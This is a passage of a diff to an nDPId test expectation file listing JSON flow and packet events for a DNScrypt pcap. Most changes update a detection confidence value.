-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":45815,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":45815,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":428,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739348756} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":428,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAABQwiUAub0RJcIKAAABuf2aQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00604{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":429,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":43540,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":429,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAAIcwidAAL0R5KwKAAABuf2aQqoUEPcCCBcWY0kBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":43540,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":429,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":43540,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":430,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":48159,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAAXcwiggAL0RAOwKAAABuf2aQrwfEPcGBB7tY0gBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":48159,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":430,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":48159,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":431,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739348756} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":431,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAABQwigAub0RJb8KAAABuf2aQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38482,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":946739348756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAAXcwikgAL0RAOsKAAABuf2aQpZSEPcGBES4Y0oBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38482,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348756,"flow_last_seen":946739348756,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348756,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38482,"dst_port":4343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":433,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739348756} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":433,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739348756,"pkt":"REREREREZmZmZmZmCABFAABQwikAub0RJb4KAAABuf2aQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":2,"flow_last_seen":946739348800,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739348800,"pkt":"ZmZmZmZmRERERERECABFAADTW7dAADkR0Ga5\/ZpCCgAAARD3svcAv+AkY0uBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPzOPvxAqRNc7Q72GZx6clSW\/rILjCJS5AVCUtIfh\/knKqjuiGnU\/ySlMpkdSKAUBEzuxnQcAR\/n3q9w6kY3ZQBbAAtR8Cvhyf4swkJ5CXEM5Flzvf2K4fhPC+UgsGecNlsAC1HwK+HJAAAAAV9TdNFfVMZR"} @@ -880,26 +880,26 @@ 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":2,"flow_last_seen":946739348805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739348805,"pkt":"ZmZmZmZmRERERERECABFAADTW7tAADkR0GK5\/ZpCCgAAARD3vB8Av9b\/Y0iBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxiY24tZG5zY3J5cHQAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAAPzOPvxAqRNc7Q72GZx6clSW\/rILjCJS5AVCUtIfh\/knKqjuiGnU\/ySlMpkdSKAUBEzuxnQcAR\/n3q9w6kY3ZQBbAAtR8Cvhyf4swkJ5CXEM5Flzvf2K4fhPC+UgsGecNlsAC1HwK+HJAAAAAV9TdNFfVMZR"} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":440,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":51647,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAIclaRAAL0RCvwKAAABjgTMb8m\/AbsCCB1KEX8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":51647,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":440,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":51647,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":441,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739348805,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739348805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":59224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":946739348805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739348805,"pkt":"REREREREZmZmZmZmCABFAAXclaUgAL0RJzsKAAABjgTMb+dYAbsGBJhPEXwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA